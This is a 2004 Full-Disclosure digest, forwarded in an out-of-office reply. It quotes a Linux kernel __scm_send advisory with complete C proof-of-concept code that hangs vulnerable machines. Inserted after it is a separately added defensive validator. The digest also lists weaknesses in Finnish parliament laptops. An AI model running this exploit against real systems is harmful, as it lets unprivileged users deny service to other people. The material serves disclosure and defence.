[Full-Disclosure] Subject: Full-Disclosure Digest, Vol 1, Issue 2116 (Back on Tuesday, December 28.)

From: Christophe Savin (christophe.savin_at_tdf.fr)
Date: 12/22/04

    Date: Wed, 22 Dec 2004 05:27:05 +0100
    To: <full-disclosure@lists.netsys.com>

    In my absence, any request concerning the networks must be sent to the e-mail address ars_reseaux@tdf.fr (or ars_transpac for any incident related to that network).

    In case of emergency, you can contact:
      The Networks Hot-line: 01 49 15 32 53
      François LEVEQUE at 01 49 15 30 56
      Pascal PAINPARAY at 01 49 15 31 36.
      Happy end-of-year holidays.
      Christophe SAVIN

    >>> full-disclosure 12/19/04 18:00 >>>

    Send Full-Disclosure mailing list submissions to

    To subscribe or unsubscribe via the World Wide Web, visit
    or, via email, send a message with subject or body 'help' to

    You can reach the person managing the list at

    When replying, please edit your Subject line so it is more specific
    than "Re: Contents of Full-Disclosure digest..."

    Today's Topics:

       1. Re: HyperTerminal - Buffer Overflow In .ht File (Gregory Gilliss)
       2. [VulnDiscuss] Re: Linux kernel scm_send local DoS
          (even multiplexed)
       3. E-mail tracking finds murderess and baby in kidnap-homicide
          case. (Tamas Feher)
       4. Re: Security breach database (Willem Koenings)
       5. Insecurity in Finnish parlament (computers) (Markus Jansson)


    Message: 1
    Date: Fri, 17 Dec 2004 10:38:23 -0800
    From: Gregory Gilliss <ggilliss@netpublishing.com>
    Subject: Re: [Full-Disclosure] HyperTerminal - Buffer Overflow In .ht
    To: full-disclosure@lists.netsys.com
    Message-ID: <20041217183823.GA20342@netpublishing.com>
    Content-Type: text/plain; charset=us-ascii

    Great, so while I'm using HyperTerminal on my network-connected machine (!)
    to update my hardware for the latest exploit, along comes someone with this
    and hacks my client laptop. Somehow I'm glad that I only use UNIX...

    -- Greg

    On or about 2004.12.15 11:59:56 +0000, Brett Moore (brett.moore@security-assessment.com) said:

    > ========================================================================
    > = HyperTerminal - Buffer Overflow In .ht File
    > =
    > = MS Bulletin posted:
    > = http://www.microsoft.com/technet/security/bulletin/MS04-043.mspx
    > =
    > = Affected Software:
    > = Microsoft Windows NT Server 4.0 SP 6a
    > = Microsoft Windows NT Server 4.0 Terminal Server Edition SP6
    > = Microsoft Windows 2000 SP4
    > = Microsoft Windows XP SP2
    > = Microsoft Windows XP 64-Bit Edition SP1
    > = Microsoft Windows XP 64-Bit Edition Version 2003
    > = Microsoft Windows Server 2003
    > = Microsoft Windows Server 2003 64-Bit Edition
    > =
    > = Public disclosure on December 15, 2004
    > ========================================================================

    Gregory A. Gilliss, CISSP                              E-mail: greg@gilliss.com
    Computer Security                             WWW: http://www.gilliss.com/greg/
    PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3

    Message: 2
    Date: Wed, 15 Dec 2004 04:23:22 +0100
    From: even multiplexed <Shadow333@gmx.at>
    Subject: [Full-Disclosure] [VulnDiscuss] Re: Linux kernel scm_send
    	local DoS
    To: security@isec.pl
    Cc: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com,
    Message-ID: <41BFAE2A.7040002@gmx.at>
    Content-Type: text/plain; charset=ISO-8859-1; format=flowed

    Paul Starzetz wrote:
    >Synopsis:  Linux kernel scm_send local DoS
    >Product:   Linux kernel
    >Version:   2.4 up to and including 2.4.28, 2.6 up to and including 2.6.9
    >Vendor:    http://www.kernel.org/
    >URL:       http://isec.pl/vulnerabilities/isec-0019-scm.txt
    >CVE:       CAN-2004-1016
    >Author:    Paul Starzetz <ihaquer@isec.pl>
    >Date:      Dec 14, 2004
    >A  locally  exploitable  flaw  has been found in the Linux socket layer,
    >that allows a local user to hang a vulnerable machine.
    >The Linux kernel provides a powerful socket API  to  user  applications.
    >Among other functions sockets provide a universal way for IPC and user-
    >kernel communication. The socket layer uses several  logical  sublayers.
    >One  of  the  layers,  so called auxiliary message layer (or scm layer),
    >augments the socket API by  a  universal  user-kernel  message  passing
    >capability (see recvfrom(2) for more details on auxiliary messages).
    >One  of  the  scm  message  parsing  functions  invoked  from the kernel
    >sendmsg() code is __scm_send() and suffers from a deadlock condition  if
    >carefully  prepared  auxiliary  message(s)  is  sent  to  a socket by an
    >unprivileged application.
    >We believe that the 2.4 kernel branch is not  further  exploitable.  The
    >2.6  branch  has not been extensively checked, however it may be locally
    >exploitable to gain elevated privileges due to its increased complexity.
    >See attached code.
    >Unprivileged local users may hang a vulnerable Linux machine.
    >Paul  Starzetz  <ihaquer@isec.pl>  has  identified the vulnerability and
    >performed further research. COPYING, DISTRIBUTION, AND  MODIFICATION  OF
    >This document and all the information it contains are provided "as  is",
    >for  educational  purposes  only,  without warranty of any kind, whether
    >express or implied.
    >The authors reserve the right not to be responsible for the  topicality,
    >correctness,  completeness  or  quality  of the information  provided in
    >this document. Liability claims regarding damage caused by  the  use  of
    >any  information  provided,  including  any kind of information which is
    >incomplete or incorrect, will therefore be rejected.
    >/*
    > *	Linux kernel 2.4 & 2.6 __scm_send DoS
    > *	Warning! this code will hang your machine
    > *
    > *      gcc -O2 scmbang.c -o scmbang
    > *
    > *      Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
    > *
    > *
    > */
    >#define _GNU_SOURCE
    >#include <stdio.h>
    >#include <stdlib.h>          /* exit() */
    >#include <string.h>          /* memset() */
    >#include <errno.h>
    >#include <sys/socket.h>
    >#include <arpa/inet.h>
    >
    >static char buf[1024];
    >
    >static void
    >fatal (const char *msg)
    >{
    >    printf ("\n");
    >    if (!errno)
    >      {
    >	  fprintf (stderr, "FATAL: %s\n", msg);
    >      }
    >    else
    >      {
    >	  perror (msg);
    >      }
    >    printf ("\n");
    >    fflush (stdout);
    >    fflush (stderr);
    >    exit (1);
    >}
    >
    >int
    >main (void)
    >{
    >    int s[2], r;
    >    struct msghdr *msg;
    >    struct cmsghdr *cmsg;
    >
    >    r = socketpair (AF_UNIX, SOCK_DGRAM, 0, s);
    >    if (r < 0)
    >	fatal ("socketpair");
    >
    >    memset (buf, 0, sizeof (buf));
    >    msg = (void *) buf;
    >    msg->msg_control = (void *) (msg + 1);
    >
    >// make bad cmsgs
    >    cmsg = (void *) msg->msg_control;
    >    cmsg->cmsg_len = sizeof (*cmsg);
    >    cmsg->cmsg_level = 0xdeadbebe;
    >    cmsg->cmsg_type = 12;	// len after overflow on second msg
    >    cmsg++;
    >
    >// -12 for deadlock
    >    cmsg->cmsg_len = -12;
    >    cmsg->cmsg_level = SOL_IP;
    >// byte length of the two headers (pointer difference, so it is also right on 64-bit)
    >    msg->msg_controllen = (char *) (cmsg + 1) - (char *) msg->msg_control;
    >
    >    r = sendmsg (s[0], msg, 0);
    >    if (r < 0)
    >	fatal ("sendmsg");
    >
    >    printf ("\nYou lucky\n");
    >    fflush (stdout);
    >    return 0;
    >}
    >- -- 
    >Paul Starzetz
    >iSEC Security Research

    Dear Ladies and Gentlemen,
    First of all, thanks to Mr. Starzetz for bringing this bug to our 
    attention. I just wanted to ask if anyone has a tip for me on how to 
    quickfix this bug, without actually rebuilding a patched version of the 
    I'd be thankful for every tip.
    I hope there's actually a way to do that, 'cause our customers wouldn't 
    like that system of ours to reboot :/
    Oliver Leitner

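
The advisory above turns on a parser trusting a cmsg_len that has wrapped around before using it to step to the next header. As an added illustration (not iSEC's or the kernel's code), here is a user-space validator that walks a control-message chain with explicit bounds checks and rejects that layout; the CM_ALIGN macro and the check_two_headers sample builder are this example's own constructions.

```c
#include <string.h>
#include <sys/socket.h>

/* Header padding as CMSG_NXTHDR and the kernel compute it. */
#define CM_ALIGN(n) (((n) + sizeof(size_t) - 1) & ~(sizeof(size_t) - 1))

/* Walk a control-message buffer with explicit bounds checks: every cmsghdr must
 * fit in the remaining space, with cmsg_len >= the header size and <= what is
 * left.  Returns the number of well-formed headers, or -1 at the first bad one. */
int cmsg_chain_check(const struct msghdr *msg)
{
    const char *base = msg->msg_control;
    size_t off = 0, total = msg->msg_controllen;
    int count = 0;

    while (off < total) {
        const struct cmsghdr *c = (const struct cmsghdr *)(base + off);
        if (total - off < sizeof *c)
            return -1;                      /* truncated header */
        if (c->cmsg_len < sizeof *c || c->cmsg_len > total - off)
            return -1;                      /* e.g. cmsg_len == (size_t)-12 */
        off += CM_ALIGN(c->cmsg_len);       /* bounded above, so no wrap-around */
        count++;
    }
    return count;
}

/* Constructed sample: two headers, the second carrying a caller-chosen
 * cmsg_len, mirroring the two-header layout of the PoC above.  A sane
 * second header yields 2; the PoC's (size_t)-12 yields -1. */
int check_two_headers(size_t second_len)
{
    static char ctl[64];
    struct msghdr msg = {0};
    struct cmsghdr *c = (struct cmsghdr *)ctl;
    int fd = 3;                             /* placeholder descriptor number */

    memset(ctl, 0, sizeof ctl);
    c->cmsg_len = CM_ALIGN(sizeof *c) + sizeof fd;   /* SCM_RIGHTS, one fd */
    c->cmsg_level = SOL_SOCKET;
    c->cmsg_type = SCM_RIGHTS;
    memcpy(ctl + CM_ALIGN(sizeof *c), &fd, sizeof fd);
    c = (struct cmsghdr *)(ctl + CM_ALIGN(c->cmsg_len));
    c->cmsg_len = second_len;
    c->cmsg_level = SOL_SOCKET;
    msg.msg_control = ctl;
    msg.msg_controllen = (size_t)((char *)(c + 1) - ctl);
    return cmsg_chain_check(&msg);
}
```

The same walk is what a defender wants in any code that consumes ancillary data from an untrusted peer: never advance by cmsg_len until it has been checked against what remains.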
    Message: 3
    Date: Sat, 18 Dec 2004 21:13:24 +0100
    From: "Tamas Feher" <etomcat@freemail.hu>
    Subject: [Full-Disclosure] E-mail tracking finds murderess and baby in
    	kidnap-homicide case.
    To: full-disclosure@lists.netsys.com
    Message-ID: <41C49D74.29818.C2BE56@localhost>
    Content-Type: text/plain; charset=US-ASCII
    Not for the faint of heart.
    BTW I love capital punishment!
    Regards: Tamas Feher.

    Message: 4
    Date: Sun, 19 Dec 2004 00:04:06 +0200
    From: Willem Koenings <infsec@gmail.com>
    Subject: Re: [Full-Disclosure] Security breach database
    To: full-disclosure@lists.netsys.com
    Message-ID: <9b13f6c1041218140468012145@mail.gmail.com>
    Content-Type: text/plain; charset=US-ASCII
    > Looking for few interesting security breach stories...
    Something to learn from :)

    Message: 5
    Date: Sun, 19 Dec 2004 03:19:38 +0200
    From: Markus Jansson <markus.jansson@hushmail.com>
    Subject: [Full-Disclosure] Insecurity in Finnish parlament (computers)
    To: full-disclosure@lists.netsys.com
    Message-ID: <41C4D72A.2010501@hushmail.com>
    Content-Type: text/plain; charset=ISO-8859-15; format=flowed
    Short version:
    "The laptop computers used by members of parliament and their assistants 
    here in Finland have severe security holes. These laptop computers don't 
    have firewalls, file encryption and wiping tools, automatic update is 
    not turned on, the operating system (Windows XP) is on its default settings 
    for most, computers only support 802.11b WLAN which is insecure, etc. 
    etc. As a bonus, they use TeliaSonera GSM:s which are totally insecure 
    because they use COMP-128-1 and A5/1 for security. I contacted them 
    months ago but they haven't bothered to answer me, nor the reporters I 
    have contacted later. Oh dear..."
    Long version:
    1. The computers do not have a firewall, not even ICF enabled. Users 
    cannot even enable it themselves, since they don't have administrative 
    permissions on the computers. Any remote-exploit vulnerability or bad 
    passphrase and BUM! The computer is hacked.
    2. The computers are mainly on default settings. They are Windows XP. Do 
    I really need to say more about this issue and what happens from it?
    3. The computers have support for Bluetooth and it is enabled by 
    default. This leaves many attack vectors in place that are pretty 
    numerous for me to tell you. Also, they have FireWire enabled, which 
    means that, as in the iPod's case, anyone with such a device can walk to one of 
    these laptops and download everything inside it. Ouch.
    4. Laptops have WLAN, but it only supports the totally insecure 802.11b 
    5. Computers do not have any kind of encryption programs. All files and 
    folders are unencrypted. Even EFS is turned off. There is no way to 
    secure personal or sensitive documents on the computer.
    6. There are no wiping tools on the computers to wipe off sensitive or 
    personal files from them.
    7. Computers do not have "Clear pagefile on shutdown" enabled, meaning 
    that sensitive data can be recovered from the unwashed swapfile later on.
    8. Users do not have administrator permissions on the computer so that they could 
    install necessary security programs on them. Of course, there is the 
    plus side that this *should* limit the damage to the systems 
    to...well..the user (= the member of parliament or their assistants). Ouch.
    9. There are VPN connections on the computers, but it is unclear whether 
    they are protected against man-in-the-middle attacks or not. My educated 
    guess is that they aren't, meaning again...
    10. It's unclear whether the computers are set to "automatic updates" or not. My 
    educated guess is that they aren't, meaning again (especially if you look 
    at point 1 again)...ouch.
    11. The default browser is Internet Explorer, with default settings 
    of course. Now, I don't have to tell you how serious a security risk this 
    is, especially if you consider point 10...
    12. MEP:s etc. use TeliaSonera GSM:s. The security that TeliaSonera uses 
    is COMP-128-1 and A5/1, which are all totally insecure and can easily be 
    broken with a laptop computer etc., meaning that their conversations can 
    easily be eavesdropped. They should use COMP-128-3 and A5/3 to make it 
    13. On TeliaSonera GSM networks, there is no protection against the 
    "false basestation" technique, which allows easy bypass of crypto by simply 
    turning it off from the "basestation". For example, Elisa uses 
    COMP-128-3 and A5/3 and does not allow phones to turn off crypto even if the 
    basestation orders them to do so.
    I contacted the security personnel in our parliament about this issue 
    months ago. They haven't even bothered to answer me, not to mention that 
    they would have fixed the computers' security problems. So, here it is, 
    maybe they'll listen now.
    My computer security & privacy related homepage
    Use HushTools or GnuPG/PGP to encrypt any email
    before sending it to me to protect our privacy.
    Full-Disclosure mailing list
    End of Full-Disclosure Digest, Vol 1, Issue 2116
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
